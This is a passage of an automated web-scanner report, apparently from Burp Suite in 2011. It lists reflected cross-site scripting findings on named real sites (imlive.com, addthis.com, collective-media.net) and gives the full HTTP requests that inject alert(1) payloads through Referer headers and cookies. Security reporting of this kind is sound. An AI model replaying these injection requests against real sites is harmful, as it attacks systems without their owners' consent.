Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nu4w0b45ssk3dn55c40usvuh; path=/; HttpOnly
Set-Cookie: pse=; expires=Thu, 27-Jan-2011 14:25:27 GMT; path=/
Set-Cookie: ASP.NET_SessionId=nu4w0b45ssk3dn55c40usvuh; path=/; HttpOnly
Set-Cookie: pse=; expires=Thu, 27-Jan-2011 14:25:27 GMT; path=/
Set-Cookie: spvdr=vd=8db8e8e9-46a0-45d8-bfb0-8a88d091bd10&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:27 GMT; path=/
Set-Cookie: ise=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:27 GMT
Connection: close
Content-Length: 18089
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=se.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=72d2d'-alert(1)-'c3f6f59e0c0&iy=dallas&id=44&iu=1&vd=8db8e8e9-46a0-45d8-bfb0-8a88d091bd10';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.1016. http://se.imlive.com/waccess/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://se.imlive.com
Path:	/waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de5e2'-alert(1)-'3ba738e3b95 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /waccess/ HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=de5e2'-alert(1)-'3ba738e3b95

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=d4ymuyz5vlrlxqnybwxqfgfk; path=/; HttpOnly
Set-Cookie: pse=; expires=Thu, 27-Jan-2011 14:25:34 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=d4ymuyz5vlrlxqnybwxqfgfk; path=/; HttpOnly
Set-Cookie: pse=; expires=Thu, 27-Jan-2011 14:25:34 GMT; path=/
Set-Cookie: spvdr=vd=12d3bb4f-0b17-405a-8c7c-520929046dc5&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:34 GMT; path=/
Set-Cookie: ise=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:33 GMT
Connection: close
Content-Length: 219716
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/hostlist.ashx&he=se.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=de5e2'-alert(1)-'3ba738e3b95&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=12d3bb4f-0b17-405a-8c7c-520929046dc5';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.1017. http://tr.imlive.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://tr.imlive.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50d83'-alert(1)-'43e531d6dcf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=50d83'-alert(1)-'43e531d6dcf

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=lqdfm52xphpiqhvqsjbar155; path=/; HttpOnly
Set-Cookie: ptr=; expires=Thu, 27-Jan-2011 14:25:36 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=lqdfm52xphpiqhvqsjbar155; path=/; HttpOnly
Set-Cookie: ptr=; expires=Thu, 27-Jan-2011 14:25:36 GMT; path=/
Set-Cookie: spvdr=vd=c1baee4a-bf16-40a0-b40b-10ada8aff0bd&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:36 GMT; path=/
Set-Cookie: itr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:35 GMT
Connection: close
Content-Length: 18568
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=tr.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=50d83'-alert(1)-'43e531d6dcf&iy=dallas&id=44&iu=1&vd=c1baee4a-bf16-40a0-b40b-10ada8aff0bd';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.1018. http://tr.imlive.com/waccess/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://tr.imlive.com
Path:	/waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d19fe'-alert(1)-'3e5a0cefaf9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /waccess/ HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d19fe'-alert(1)-'3e5a0cefaf9

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nqpd3y552hhidx45u5qby525; path=/; HttpOnly
Set-Cookie: ptr=; expires=Thu, 27-Jan-2011 14:25:42 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nqpd3y552hhidx45u5qby525; path=/; HttpOnly
Set-Cookie: ptr=; expires=Thu, 27-Jan-2011 14:25:42 GMT; path=/
Set-Cookie: spvdr=vd=96095777-d5e3-483a-b97f-6ff3054b20ff&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:42 GMT; path=/
Set-Cookie: itr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:42 GMT
Connection: close
Content-Length: 227883
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/hostlist.ashx&he=tr.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=d19fe'-alert(1)-'3e5a0cefaf9&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=96095777-d5e3-483a-b97f-6ff3054b20ff';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.1019. http://www.addthis.com/bookmark.php [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload f58e6<script>alert(1)</script>92948c436fb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f58e6<script>alert(1)</script>92948c436fb

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 93088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<h4>f58e6<script>alert(1)</script>92948c436fb - Google search</h4>
...[SNIP]...

4.1020. http://www.addthis.com/bookmark.php [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 405bb"><script>alert(1)</script>f8b1a525fe6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 93102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=405bb"><script>alert(1)</script>f8b1a525fe6" />
...[SNIP]...

4.1021. http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/bzo.847.CD39C435/ATF

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33bcc'%3balert(1)//f730c6ce108 was submitted in the cli cookie. This input was echoed as 33bcc';alert(1)//f730c6ce108 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/bzo.847.CD39C435/ATF HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b333bcc'%3balert(1)//f730c6ce108; nadp=1; rdst4=1; rdst3=1;

Response

4.1022. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 567d1'%3balert(1)//8127cba5a34 was submitted in the cli cookie. This input was echoed as 567d1';alert(1)//8127cba5a34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/iblocal.revinet.bostonherald/audience;sz=300x250;net=iblocal;ord=0.9691057777963579;env=ifr;ord1=80394;cmpgurl=http%253A//www.bostonherald.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3567d1'%3balert(1)//8127cba5a34; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:27 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:27 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 29-Jan-2011 09:54:27 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:27 GMT
Content-Length: 7745

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
vascript">CollectiveMedia.createAndAttachAd("iblocal-22806307_1296266067","http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience;net=iblocal;u=,iblocal-22806307_1296266067,11d765b6a10b1b3567d1';alert(1)//8127cba5a34,Miscellaneous,;;sz=300x250;net=iblocal;env=ifr;ord1=80394;contx=Miscellaneous;dc=w;btg=;ord=0.9691057777963579?","300","250",true);</scr'+'ipt>
...[SNIP]...

4.1023. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 219ad"%3balert(1)//eb02bd66d47 was submitted in the cli cookie. This input was echoed as 219ad";alert(1)//eb02bd66d47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/iblocal.revinet.bostonherald/audience;sz=300x250;net=iblocal;ord=0.9691057777963579;env=ifr;ord1=80394;cmpgurl=http%253A//www.bostonherald.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3219ad"%3balert(1)//eb02bd66d47; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:26 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:26 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 29-Jan-2011 09:54:26 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:26 GMT
Content-Length: 7745

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11d765b6a10b1b3219ad";alert(1)//eb02bd66d47&seg_code=noseg&ord=1296266066",true);CollectiveMedia.addPixel("http://tags.bluekai.com/site/2731",false);CollectiveMedia.addPixel("http://pixel.quantserve.com/seg/r;a=p-86ZJnSph3DaTI;rand=164628109;re
...[SNIP]...

4.1024. http://a.collective-media.net/cmadj/q1.bosherald/be_ent [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/be_ent

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca275'%3balert(1)//bab4de1adb9 was submitted in the cli cookie. This input was echoed as ca275';alert(1)//bab4de1adb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/q1.bosherald/be_ent;sz=300x250;net=q1;ord=2134060438?;env=ifr;ord1=204282;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3ca275'%3balert(1)//bab4de1adb9; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.1025. http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/be_ent_fr

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e74d'%3balert(1)//8718b1bc98e was submitted in the cli cookie. This input was echoed as 1e74d';alert(1)//8718b1bc98e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/q1.bosherald/be_ent_fr;sz=300x250;net=q1;ord=1194202561?;env=ifr;ord1=359683;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b31e74d'%3balert(1)//8718b1bc98e; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.1026. http://a.collective-media.net/cmadj/q1.bosherald/ent [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/ent

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f52a'%3balert(1)//5cd194822d7 was submitted in the cli cookie. This input was echoed as 1f52a';alert(1)//5cd194822d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/q1.bosherald/ent;sz=300x250;net=q1;ord=395221226?;env=ifr;ord1=173312;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b31f52a'%3balert(1)//5cd194822d7; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.1027. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/ent_fr

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8aed7'%3balert(1)//fa2fa400f77 was submitted in the cli cookie. This input was echoed as 8aed7';alert(1)//fa2fa400f77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/q1.bosherald/ent_fr;sz=300x250;net=q1;ord=269011797?;env=ifr;ord1=820052;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b38aed7'%3balert(1)//fa2fa400f77; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.1028. http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5bd7'%3balert(1)//464e19fd8c7 was submitted in the cli cookie. This input was echoed as e5bd7';alert(1)//464e19fd8c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

